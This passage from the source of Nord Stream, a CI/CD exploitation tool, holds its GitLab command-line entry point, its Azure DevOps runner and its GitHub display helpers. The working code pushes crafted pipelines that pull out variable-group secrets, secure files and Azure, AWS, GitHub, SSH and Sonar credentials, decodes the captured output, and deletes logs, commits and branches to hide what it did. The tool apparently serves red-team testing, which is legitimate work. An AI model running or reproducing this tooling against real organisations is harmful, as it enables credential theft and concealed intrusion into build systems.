args["--clean-branch-policy"]: gitHubWorkflowRunner.manualCleanBranchPolicy() elif args["--list-protections"]: gitHubWorkflowRunner.writeAccessFilter = True gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.checkBranchProtections() else: gitHubWorkflowRunner.writeAccessFilter = True gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.start() ================================================ FILE: nordstream/commands/gitlab.py ================================================ """ CICD pipeline exploitation tool Usage: nord-stream gitlab [options] --token (--list-secrets | --list-protections) [--project --group --no-project --no-group --no-instance --write-filter --sleep ] nord-stream gitlab [options] --token ( --list-groups | --list-projects | --list-users | --list-runners) [--project --group --write-filter] nord-stream gitlab [options] --token --yaml --project [--project-path --no-clean] nord-stream gitlab [options] --token --clean-logs [--project ] nord-stream gitlab [options] --token --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs --url Gitlab URL [default: https://gitlab.com] --ignore-cert Allow insecure server connections --membership Limit by projects that the current user is a member of Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token GitLab personal access token or _gitlab_session cookie --project Run on selected project (can be a file / project id) --group Run on selected group (can be a file) --list-secrets List all secrets. --list-protections List branch protection rules. --list-projects List all projects. --list-groups List all groups. --list-users List all users. --list-runners List runners through project jobs (unprivileged, but non-exhaustive). --write-filter Filter repo where current user has developer access or more. --no-project Don't extract project secrets. --no-group Don't extract group secrets. --no-instance Don't extract instance secrets. -y, --yaml Run arbitrary job --branch-name Use specific branch name for deployment. --clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean pipeline logs (default false) --describe-token Display information on the token --sleep Time to sleep in seconds between each secret request. --project-path Local path of the git folder. Examples: Dump all secrets $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets Deploy the custom pipeline on the master branch $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname' Authors: @hugow @0hexit """ from docopt import docopt from nordstream.cicd.gitlab import GitLab from nordstream.core.gitlab.gitlab import GitLabRunner from nordstream.utils.log import logger, NordStreamLog from nordstream.git import Git def start(argv): args = docopt(__doc__, argv=argv) if args["--verbose"]: NordStreamLog.setVerbosity(verbose=1) if args["--debug"]: NordStreamLog.setVerbosity(verbose=2) logger.debug(args) # check validity of the token if not GitLab.checkToken(args["--token"], args["--url"], (not args["--ignore-cert"])): logger.critical('Invalid token or the token doesn\'t have the "api" scope.') # gitlab setup gitlab = GitLab(args["--url"], args["--token"], (not args["--ignore-cert"])) if args["--output-dir"]: gitlab.outputDir = args["--output-dir"] + "/" gitLabRunner = GitLabRunner(gitlab) if args["--key-id"]: Git.KEY_ID = args["--key-id"] if args["--user"]: Git.USER = args["--user"] if args["--email"]: Git.EMAIL = args["--email"] if args["--branch-name"]: gitlab.branchName = args["--branch-name"] logger.info(f'Using branch: "{gitlab.branchName}"') # config if args["--write-filter"]: gitLabRunner.writeAccessFilter = args["--write-filter"] if args["--no-project"]: gitLabRunner.extractProject = not args["--no-project"] if args["--no-group"]: gitLabRunner.extractGroup = not args["--no-group"] if args["--no-instance"]: gitLabRunner.extractInstance = not args["--no-instance"] if args["--no-clean"]: gitLabRunner.cleanLogs = not args["--no-clean"] if args["--yaml"]: gitLabRunner.yaml = args["--yaml"] if args["--sleep"]: gitLabRunner.sleepTime = args["--sleep"] if args["--project-path"]: gitLabRunner.localPath = args["--project-path"] # logic if args["--describe-token"]: gitLabRunner.describeToken() elif args["--list-projects"]: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) gitLabRunner.listGitLabProjects() elif args["--list-protections"]: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) gitLabRunner.listBranchesProtectionRules() elif args["--list-groups"]: gitLabRunner.getGroups(args["--group"]) gitLabRunner.listGitLabGroups() elif args["--list-users"]: gitLabRunner.listGitLabUsers() elif args["--list-runners"]: if gitLabRunner.extractProject: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) if gitLabRunner.extractGroup: gitLabRunner.getGroups(args["--group"]) gitLabRunner.listGitLabRunners() elif args["--list-secrets"]: if gitLabRunner.extractProject: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) if gitLabRunner.extractGroup: gitLabRunner.getGroups(args["--group"]) gitLabRunner.listGitLabSecrets() elif args["--clean-logs"]: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) gitLabRunner.manualCleanLogs() else: gitLabRunner.getProjects(args["--project"], strict=True, membership=args["--membership"]) gitLabRunner.runPipeline() ================================================ FILE: nordstream/core/devops/devops.py ================================================ import base64 import logging import subprocess import time from os import chdir, makedirs from os.path import exists, realpath from nordstream.git import Git from nordstream.utils.errors import DevOpsError, GitError, RepoCreationError from nordstream.utils.helpers import isAllowed from nordstream.utils.log import logger from nordstream.yaml.devops import DevOpsPipelineGenerator class DevOpsRunner: _cicd = None _extractVariableGroups = True _extractSecureFiles = True _extractAzureServiceconnections = True _extractGitHubServiceconnections = True _extractAWSServiceconnections = True _extractSonarServiceconnections = True _extractSSHServiceConnections = True _yaml = None _writeAccessFilter = False _poolName = None _os = "linux" _pipelineFilename = "azure-pipelines.yml" _output = None _cleanLogs = True _resType = {"default": 0, "doubleb64": 1, "github": 2, "azurerm": 3} _pushedCommitsCount = 0 _branchAlreadyExists = False _allowedTypes = ["azurerm", "github", "aws", "sonarqube", "ssh"] def __init__(self, cicd): self._cicd = cicd self.__createLogDir() @property def extractVariableGroups(self): return self._extractVariableGroups @extractVariableGroups.setter def extractVariableGroups(self, value): self._extractVariableGroups = value @property def extractSecureFiles(self): return self._extractSecureFiles @extractSecureFiles.setter def extractSecureFiles(self, value): self._extractSecureFiles = value @property def extractAzureServiceconnections(self): return self._extractAzureServiceconnections @extractAzureServiceconnections.setter def extractAzureServiceconnections(self, value): self._extractAzureServiceconnections = value @property def extractGitHubServiceconnections(self): return self._extractGitHubServiceconnections @extractGitHubServiceconnections.setter def extractGitHubServiceconnections(self, value): self._extractGitHubServiceconnections = value @property def extractAWSServiceconnections(self): return self._extractAWSServiceconnections @extractAWSServiceconnections.setter def extractAWSServiceconnections(self, value): self._extractAWSServiceconnections = value @property def extractSonarerviceconnections(self): return self._extractSonarServiceconnections @extractSonarerviceconnections.setter def extractSonarerviceconnections(self, value): self._extractSonarServiceconnections = value @property def extractSSHServiceConnections(self): return self._extractSSHServiceConnections @extractSSHServiceConnections.setter def extractSSHServiceConnections(self, value): self._extractSSHServiceConnections = value @property def output(self): return self._output @output.setter def output(self, value): self._output = value @property def cleanLogs(self): return self._cleanLogs @cleanLogs.setter def cleanLogs(self, value): self._cleanLogs = value @property def yaml(self): return self._yaml @yaml.setter def yaml(self, value): self._yaml = realpath(value) @property def pipelineFilename(self): return self._pipelineFilename @pipelineFilename.setter def pipelineFilename(self, value): self._pipelineFilename = value @property def writeAccessFilter(self): return self._writeAccessFilter @writeAccessFilter.setter def writeAccessFilter(self, value): self._writeAccessFilter = value @property def poolName(self): return self._poolName @poolName.setter def poolName(self, value): self._poolName = value @property def os(self): return self._os @os.setter def os(self, value): self._os = value def __createLogDir(self): self._cicd.outputDir = realpath(self._cicd.outputDir) + "/azure_devops" makedirs(self._cicd.outputDir, exist_ok=True) def listDevOpsProjects(self): logger.info("Listing all projects:") for p in self._cicd.projects: name = p.get("name") logger.raw(f"- {name}\n", level=logging.INFO) def listDevOpsRepositories(self): logger.info("Listing all repositories:") for p in self._cicd.projects: project_name = p.get("name") for r in self._cicd.listRepositories(project_name): name = r.get("name") logger.raw(f"- {project_name}/{name}\n", level=logging.INFO) def listDevOpsUsers(self): logger.info("Listing all users:") for p in self._cicd.listUsers(): origin = p.get("origin") displayName = p.get("displayName") mailAddress = p.get("mailAddress") res = f"- {displayName}" if mailAddress != "": res += f" / {mailAddress}" res += f" ({origin})\n" logger.raw(res, level=logging.INFO) def getProjects(self, project): if project: if exists(project): with open(project, "r") as file: for project in file: self._cicd.addProject(project.strip()) else: self._cicd.addProject(project) else: self._cicd.listProjects() if self._writeAccessFilter: self._cicd.filterWriteProjects() if len(self._cicd.projects) == 0: if self._writeAccessFilter: logger.critical("No project with write access found.") else: logger.critical("No project found.") def listProjectSecrets(self): logger.info("Listing secrets") for project in self._cicd.projects: projectName = project.get("name") projectId = project.get("id") logger.info(f'"{projectName}" secrets') self.__displayProjectVariableGroupsSecrets(projectId) self.__displayProjectSecureFiles(projectId) self.__displayServiceConnections(projectId) logger.empty_line() def __displayProjectVariableGroupsSecrets(self, project): try: secrets = self._cicd.listProjectVariableGroupsSecrets(project) except DevOpsError as e: logger.error(e) else: if len(secrets) != 0: for variableGroup in secrets: logger.info(f"Variable group: \"{variableGroup.get('name')}\"") for sec in variableGroup.get("variables"): logger.raw(f"\t- {sec}\n", logging.INFO) def __displayProjectSecureFiles(self, project): try: secureFiles = self._cicd.listProjectSecureFiles(project) except DevOpsError as e: logger.error(e) else: if secureFiles: for sf in secureFiles: logger.info(f'Secure file: "{sf["name"]}"') def __displayServiceConnections(self, projectId): try: serviceConnections = self._cicd.listServiceConnections(projectId) except DevOpsError as e: logger.error(e) else: if len(serviceConnections) != 0: logger.info("Service connections:") for sc in serviceConnections: scType = sc.get("type") scName = sc.get("name") logger.raw(f"\t- {scName} ({scType})\n", logging.INFO) def __checkSecrets(self, project): projectId = project.get("id") projectName = project.get("name") secrets = 0 if ( self._extractAzureServiceconnections or self._extractGitHubServiceconnections or self._extractAWSServiceconnections or self._extractSonarServiceconnections or self._extractSSHServiceConnections ): try: secrets += len(self._cicd.listServiceConnections(projectId)) except DevOpsError as e: logger.error(f"Error while listing service connection: {e}") if self._extractVariableGroups: try: secrets += len(self._cicd.listProjectVariableGroupsSecrets(projectId)) except DevOpsError as e: logger.error(f"Error while listing variable groups: {e}") if self._extractSecureFiles: try: secrets += len(self._cicd.listProjectSecureFiles(projectId)) except DevOpsError as e: logger.error(f"Error while listing secure files: {e}") if secrets == 0: logger.info(f'No secrets found for project "{projectName}" / "{projectId}"') return False return True def createYaml(self, pipelineType): pipelineGenerator = DevOpsPipelineGenerator() if pipelineType == "github": pipelineGenerator.generatePipelineForGitHub("#FIXME", self._poolName, self._os) elif pipelineType == "azurerm": pipelineGenerator.generatePipelineForAzureRm("#FIXME", self._poolName, self._os) elif pipelineType == "aws": pipelineGenerator.generatePipelineForAWS("#FIXME", self._poolName, self._os) elif pipelineType == "sonar": pipelineGenerator.generatePipelineForSonar("#FIXME", self._poolName, self._os) elif pipelineType == "ssh": pipelineGenerator.generatePipelineForSSH("#FIXME", self._poolName, self._os) else: pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""}, self._poolName, self._os) logger.success("YAML file: ") pipelineGenerator.displayYaml() pipelineGenerator.writeFile(self._output) def __extractPipelineOutput(self, projectId, resType=0, resultsFilename="secrets.txt"): with open( f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{self._fileName}", "rb", ) as output: try: if resType == self._resType["doubleb64"]: pipelineResults = self.__doubleb64(output) elif resType == self._resType["github"]: pipelineResults = self.__extractGitHubResults(output) elif resType == self._resType["azurerm"]: pipelineResults = self.__azureRm(output) elif resType == self._resType["default"]: pipelineResults = output.read() else: logger.exception("Invalid type checkout: _resType") except: output.seek(0) pipelineResults = output.read() logger.success("Output:") logger.raw(pipelineResults, logging.INFO) with open(f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{resultsFilename}", "ab") as file: file.write(pipelineResults) @staticmethod def __extractGitHubResults(output): decoded = DevOpsRunner.__doubleb64(output) for line in decoded.split(b"\n"): if b"AUTHORIZATION" in line: try: return base64.b64decode(line.split(b" ")[-1]) + b"\n" except Exception as e: logger.error(e) return None @staticmethod def __doubleb64(output): # well it's working data = output.readlines()[-3].split(b" ")[1] return base64.b64decode(base64.b64decode(data)) @staticmethod def __azureRm(output): # well it's working data = output.readlines()[-3].split(b" ")[1] return base64.b64decode(base64.b64decode(data)) def __launchPipeline(self, project, pipelineId, pipelineGenerator): logger.verbose(f"Launching pipeline.") pipelineGenerator.writeFile(f"./{self._pipelineFilename}") pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() try: if b"Everything up-to-date" in pushOutput.communicate()[1].strip(): logger.error("Error when pushing code: Everything up-to-date") logger.warning( "Your trying to push the same code on an existing branch, modify the yaml file to push it." ) elif pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) else: self._pushedCommitsCount += 1 logger.raw(pushOutput.communicate()[1]) # manual trigger because otherwise is difficult to get the right runId run = self._cicd.runPipeline(project, pipelineId) self.__checkRunErrors(run) runId = run.get("id") pipelineStatus = self._cicd.waitPipeline(project, pipelineId, runId) if pipelineStatus == "succeeded": logger.success("Pipeline has successfully terminated.") return runId elif pipelineStatus == "failed": self.__displayFailureReasons(project, runId) return None except Exception as e: logger.error(e) finally: pass def __displayFailureReasons(self, projectId, runId): logger.error("Workflow failure:") for reason in self._cicd.getFailureReason(projectId, runId): logger.error(f"{reason}") def __extractVariableGroupsSecrets(self, projectId, pipelineId): logger.verbose(f"Getting variable groups secrets") try: variableGroups = self._cicd.listProjectVariableGroupsSecrets(projectId) except DevOpsError as e: logger.error(e) else: if len(variableGroups) > 0: for variableGroup in variableGroups: pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSecretExtraction(variableGroup, self._poolName, self._os) logger.verbose( f'Checking (and modifying) pipeline permissions for variable group: "{variableGroup["name"]}"' ) if not self._cicd.authorizePipelineForResourceAccess( projectId, pipelineId, variableGroup, "variablegroup" ): continue variableGroupName = variableGroup.get("name") logger.info(f'Extracting secrets for variable group: "{variableGroupName}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() else: logger.info("No variable groups found") def __extractSecureFiles(self, projectId, pipelineId): logger.verbose(f"Getting secure files") try: secureFiles = self._cicd.listProjectSecureFiles(projectId) except DevOpsError as e: logger.error(e) else: if secureFiles: for secureFile in secureFiles: pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSecureFileExtraction(secureFile["name"], self._poolName) logger.verbose( f'Checking (and modifying) pipeline permissions for the secure file: "{secureFile["name"]}"' ) if not self._cicd.authorizePipelineForResourceAccess( projectId, pipelineId, secureFile, "securefile" ): continue logger.info(f'Extracting secure file: "{secureFile["name"]}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: date = time.strftime("%Y-%m-%d_%H-%M-%S") safeSecureFilename = "".join( [c for c in secureFile["name"] if c.isalpha() or c.isdigit() or c in (" ", ".")] ).strip() self.__extractPipelineOutput( projectId, self._resType["doubleb64"], f"pipeline_{date}_secure_file_{safeSecureFilename}", ) logger.empty_line() else: logger.info("No secure files found") def __extractGitHubSecrets(self, projectId, pipelineId, sc): endpoint = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForGitHub(endpoint, self._poolName, self._os) logger.info(f'Extracting secrets for GitHub: "{endpoint}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["github"]) logger.empty_line() def __extractAzureRMSecrets(self, projectId, pipelineId, sc): scheme = sc.get("authorization").get("scheme").lower() if scheme == "serviceprincipal": name = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForAzureRm(name, self._poolName, self._os) logger.info(f'Extracting secrets for AzureRM: "{name}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["azurerm"]) logger.empty_line() else: logger.error(f"Unsupported scheme: {scheme}") def __extractAWSSecrets(self, projectId, pipelineId, sc): scheme = sc.get("authorization").get("scheme").lower() if scheme == "usernamepassword": name = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForAWS(name, self._poolName, self._os) logger.info(f'Extracting secrets for AWS: "{name}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() else: logger.error(f"Unsupported scheme: {scheme}") def __extractSonarSecrets(self, projectId, pipelineId, sc): endpoint = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSonar(endpoint, self._poolName, self._os) logger.info(f'Extracting secrets for Sonar: "{endpoint}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() def __extractSSHSecrets(self, projectId, pipelineId, sc): endpoint = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSSH(endpoint, self._poolName, self._os) logger.info(f'Extracting secrets for ssh: "{endpoint}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() def __extractServiceConnectionsSecrets(self, projectId, pipelineId): try: serviceConnections = self._cicd.listServiceConnections(projectId) except DevOpsError as e: logger.error(e) else: for sc in serviceConnections: scType = sc.get("type").lower() if scType in self._allowedTypes: logger.verbose( f'Checking (and modifying) pipeline permissions for the service connection: "{sc["name"]}"' ) if not self._cicd.authorizePipelineForResourceAccess(projectId, pipelineId, sc, "endpoint"): continue if self._extractAzureServiceconnections and scType == "azurerm": self.__extractAzureRMSecrets(projectId, pipelineId, sc) elif self._extractGitHubServiceconnections and scType == "github": self.__extractGitHubSecrets(projectId, pipelineId, sc) elif self._extractAWSServiceconnections and scType == "aws": self.__extractAWSSecrets(projectId, pipelineId, sc) elif self._extractSonarServiceconnections and scType == "sonarqube": self.__extractSonarSecrets(projectId, pipelineId, sc) elif self._extractSSHServiceConnections and scType == "ssh": self.__extractSSHSecrets(projectId, pipelineId, sc) def manualCleanLogs(self): logger.info("Deleting logs") for project in self._cicd.projects: projectId = project.get("id") logger.info(f"Cleaning logs for project: {projectId}") self._cicd.cleanAllLogs(projectId) def __runSecretsExtractionPipeline(self, projectId, pipelineId): if self._extractVariableGroups: self.__extractVariableGroupsSecrets(projectId, pipelineId) if self._extractSecureFiles: self.__extractSecureFiles(projectId, pipelineId) if ( self._extractAzureServiceconnections or self._extractGitHubServiceconnections or self._extractAWSServiceconnections or self._extractSonarServiceconnections or self._extractSSHServiceConnections ): self.__extractServiceConnectionsSecrets(projectId, pipelineId) def __pushEmptyFile(self): Git.gitCreateDummyFile("README.md") diffOutput = Git.gitDiffFile("README.md") stdout, stderr = diffOutput.communicate() if stdout == b"": logger.verbose(f"README.md file not modified.") else: logger.verbose(f"README.md file is modified, incrementing commit count.") self._pushedCommitsCount += 1 pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() try: if pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) else: logger.raw(pushOutput.communicate()[1]) except Exception as e: logger.exception(e) def __createRemoteRepo(self, projectId): repo = self._cicd.createGit(projectId) if repo.get("id"): repoId = repo.get("id") logger.info(f'New remote repository created: "{self._cicd.repoName}" / "{repoId}"') return repo else: return None def __getRemoteRepo(self, projectId): for repo in self._cicd.listRepositories(projectId): if self._cicd.repoName == repo.get("name"): return repo, False repo = self.__createRemoteRepo(projectId) if repo != None: return repo, True raise RepoCreationError("No repo found") def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput = Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return False return True def __clean(self, projectId, repoId, deleteRemoteRepo, deleteRemotePipeline): if self._cleanLogs: if deleteRemotePipeline: logger.verbose("Deleting remote pipeline.") self._cicd.deletePipeline(projectId) if deleteRemoteRepo: logger.verbose("Deleting remote repository.") self._cicd.deleteGit(projectId, repoId) else: if self._pushedCommitsCount > 0: if self._cleanLogs: logger.info(f"Cleaning logs for project: {projectId}") self._cicd.cleanAllLogs(projectId) logger.verbose("Cleaning commits.") if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName: Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount) else: if not self.__deleteRemoteBranch(): logger.info("Cleaning remote branch.") # rm everything if we can't delete the branch (only leave one file otherwise it will try to rm the branch) Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True) def __createPipeline(self, projectId, repoId): logger.info("Getting pipeline") self.__pushEmptyFile() for pipeline in self._cicd.listPipelines(projectId): if pipeline.get("name") == self._cicd.pipelineName: return pipeline.get("id"), False pipelineId = self._cicd.createPipeline(projectId, repoId, f"{self._pipelineFilename}") if pipelineId: return pipelineId, True else: raise Exception("unable to create a pipeline") def __runCustomPipeline(self, projectId, pipelineId): pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.loadFile(self._yaml) logger.info("Running arbitrary pipeline") runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId) logger.empty_line() def runPipeline(self): for project in self._cicd.projects: projectId = project.get("id") repoId = None deleteRemoteRepo = False deleteRemotePipeline = False # skip if no secrets if not self._yaml: if not self.__checkSecrets(project): continue try: # Create or get first repo of the project repo, deleteRemoteRepo = self.__getRemoteRepo(projectId) repoId = repo.get("id") self._cicd.repoName = repo.get("name") logger.info(f'Getting remote repository: "{self._cicd.repoName}" /' f' "{repoId}"') url = f"https://foo:{self._cicd.token}@dev.azure.com/{self._cicd.org}/{projectId}/_git/{self._cicd.repoName}" if not Git.gitClone(url): raise GitError("Fail to clone the repository") chdir(self._cicd.repoName) self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) pipelineId, deleteRemotePipeline = self.__createPipeline(projectId, repoId) if self._yaml: self.__runCustomPipeline(projectId, pipelineId) else: self.__runSecretsExtractionPipeline(projectId, pipelineId) except (GitError, RepoCreationError) as e: name = project.get("name") logger.error(f"Error in project {name}: {e}") except KeyboardInterrupt: self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline) chdir("../") subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait() except Exception as e: logger.error(f"Error during pipeline run: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline) chdir("../") subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait() else: self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline) chdir("../") subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait() def describeToken(self): response = self._cicd.getUser() logger.info("Token information:") username = response.get("authenticatedUser").get("properties").get("Account").get("$value") if username != "": logger.raw(f"\t- Username: {username}\n", logging.INFO) id = response.get("authenticatedUser").get("id") if id != "": logger.raw(f"\t- Id: {id}\n", logging.INFO) def __checkRunErrors(self, run): if run.get("customProperties") != None: validationResults = run.get("customProperties").get("ValidationResults", []) msg = "" for res in validationResults: if res.get("result", "") == "error": if "Verify the name and credentials being used" in res.get("message", ""): raise DevOpsError("The stored token is not valid anymore.") msg += res.get("message", "") + "\n" raise DevOpsError(msg) def parseExtractList(self, extractList, allow=True): extractList = extractList.split(",") if extractList else [] self._extractVariableGroups = isAllowed("vg", extractList, allow) self._extractSecureFiles = isAllowed("sf", extractList, allow) self._extractAzureServiceconnections = isAllowed("az", extractList, allow) self._extractGitHubServiceconnections = isAllowed("gh", extractList, allow) self._extractAWSServiceconnections = isAllowed("aws", extractList, allow) self._extractSonarServiceconnections = isAllowed("sonar", extractList, allow) self._extractSSHServiceConnections = isAllowed("ssh", extractList, allow) ================================================ FILE: nordstream/core/github/display.py ================================================ from nordstream.utils.log import logger import logging from nordstream.core.github.protections import getUsersArray, getTeamsOrAppsArray def displayRepoSecrets(secrets): if len(secrets) != 0: logger.info("Repo secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayDependabotRepoSecrets(secrets): if len(secrets) != 0: logger.info("Dependabot repo secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayEnvSecrets(env, secrets): if len(secrets) != 0: logger.info(f"{env} secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayOrgSecrets(secrets): if len(secrets) != 0: logger.info("Repository organization secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayDependabotOrgSecrets(secrets): if len(secrets) != 0: logger.info("Dependabot organization secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayEnvSecurity(envDetails): protectionRules = envDetails.get("protection_rules") envName = envDetails.get("name") if len(protectionRules) > 0: logger.info(f'Environment protection for: "{envName}":') for protection in protectionRules: if protection.get("type") == "required_reviewers": for reviewer in protection.get("reviewers"): reviewerType = reviewer.get("type") login = reviewer.get("reviewer").get("login") userId = reviewer.get("reviewer").get("id") logger.raw( f"\t- reviewer ({reviewerType}): {login}/{userId}\n", logging.INFO, ) elif protection.get("type") == "wait_timer": wait = protection.get("wait_timer") logger.raw(f"\t- timer: {wait} min\n", logging.INFO) else: branchPolicy = envDetails.get("deployment_branch_policy") if branchPolicy.get("custom_branch_policies", False): logger.raw(f"\t- deployment branch policy: custom\n", logging.INFO) else: logger.raw(f"\t- deployment branch policy: protected\n", logging.INFO) else: logger.info(f'No environment protection rule found for: "{envName}"') def displayBranchProtectionRules(protections): logger.info("Branch protections:") logger.raw( f'\t- enforce admins: {protections.get("enforce_admins").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- block creations:" f' {protections.get("block_creations").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- required signatures:" f' {protections.get("required_signatures").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- allow force pushes:" f' {protections.get("allow_force_pushes").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- allow deletions:" f' {protections.get("allow_deletions").get("enabled")}\n', logging.INFO, ) if protections.get("restrictions"): displayRestrictions(protections.get("restrictions")) if protections.get("required_pull_request_reviews"): displayRequiredPullRequestReviews(protections.get("required_pull_request_reviews")) else: logger.raw(f"\t- required pull request reviews: False\n", logging.INFO) if protections.get("required_status_checks"): displayRequiredStatusChecks(protections.get("required_status_checks")) logger.raw( "\t- required linear history:" f' {protections.get("required_linear_history").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- required conversation resolution:" f' {protections.get("required_conversation_resolution").get("enabled")}\n', logging.INFO, ) logger.raw( f'\t- lock branch: {protections.get("lock_branch").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- allow fork syncing:" f' {protections.get("allow_fork_syncing").get("enabled")}\n', logging.INFO, ) def displayRequiredStatusChecks(data): logger.raw(f"\t- required status checks:\n", logging.INFO) logger.raw(f'\t - strict: {data.get("strict")}\n', logging.INFO) if len(data.get("contexts")) != 0: logger.raw(f'\t - contexts: {data.get("contexts")}\n', logging.INFO) if len(data.get("checks")) != 0: logger.raw(f'\t - checks: {data.get("checks")}\n', logging.INFO) def displayRequiredPullRequestReviews(data): logger.raw(f"\t- pull request reviews:\n", logging.INFO) logger.raw(f'\t - approving review count: {data.get("required_approving_review_count")}\n', logging.INFO) logger.raw(f'\t - require code owner reviews: {data.get("require_code_owner_reviews")}\n', logging.INFO) logger.raw(f'\t - require last push approval: {data.get("require_last_push_approval")}\n', logging.INFO) logger.raw(f'\t - dismiss stale reviews: {data.get("dismiss_stale_reviews")}\n', logging.INFO) if data.get("dismissal_restrictions"): users = getUsersArray(data.get("dismissal_restrictions").get("users")) teams = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("teams")) apps = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("apps")) if len(users) != 0 or len(teams) != 0 or len(apps) != 0: logger.raw(f"\t - dismissal_restrictions:\n", logging.INFO) if len(users) != 0: logger.raw(f"\t - users: {users}\n", logging.INFO) if len(teams) != 0: logger.raw(f"\t - teams: {teams}\n", logging.INFO) if len(apps) != 0: logger.raw(f"\t - apps: {apps}\n", logging.INFO) if data.get("bypass_pull_request_allowances"): users = getUsersArray(data.get("bypass_pull_request_allowances").get("users")) teams = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("teams")) apps = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("apps")) if len(users) != 0 or len(teams) != 0 or len(apps) != 0: logger.raw(f"\t - bypass pull request allowances:\n", logging.INFO) if len(users) != 0: logger.raw(f"\t - users: {users}\n", logging.INFO) if len(teams) != 0: logger.raw(f"\t - teams: {teams}\n", logging.INFO) if len(apps) != 0: logger.raw(f"\t - apps: {apps}\n", logging.INFO) def displayRestrictions(data): users = getUsersArray(data.get("users")) teams = getTeamsOrAppsArray(data.get("teams")) apps = getTeamsOrAppsArray(data.get("apps")) if len(users) != 0 or len(teams) != 0 or len(apps) != 0: logger.raw(f"\t- person allowed to push to restricted branches (restrictions):\n", 